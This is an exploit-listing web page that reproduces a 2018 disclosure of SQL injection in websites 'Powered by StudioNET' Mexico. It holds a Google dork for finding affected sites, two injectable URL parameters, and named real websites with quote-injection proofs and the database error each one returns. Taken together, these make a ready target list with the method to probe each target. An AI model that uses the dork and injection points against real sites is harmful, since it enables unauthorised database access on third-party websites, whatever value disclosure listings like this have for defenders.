Advertisement






Powered by StudioNET Mexico SQL Injection Vulnerability

CVE Category Price Severity
N/A CWE-89 N/A High
Author Risk Exploitation Type Date
Unknown High Remote 2018-09-07
CPE
cpe:cpe:/a:studionet:mexico
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018090065

Below is a copy:

Powered by StudioNET Mexico SQL Injection Vulnerability
#################################################################################################

# Exploit Title : Powered by StudioNET Mexico SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 07/09/2018
# Vendor Homepage : studionet.mx ~ studionet-mx.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

StudioNET - Diseo de Logotipos, Sitios Web e Imagen Grfica SQL Injection Vulnerability 

# Google Dork  : intext:''Powered by StudioNET''

# Exploit : 

/ver_subcategoria.php?id=[SQL Inj]

/e_RECETAS.php?mod=ver&id=[SQL Inj]

#################################################################################################

# Example Site => 

garcia-s.com/ver_subcategoria.php?id=29%27 => [ Proof of Concept ] => archive.is/LESJt

pastranasproduce.com/e_RECETAS.php?mod=ver&id=8%27

# SQL Database Error => 

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.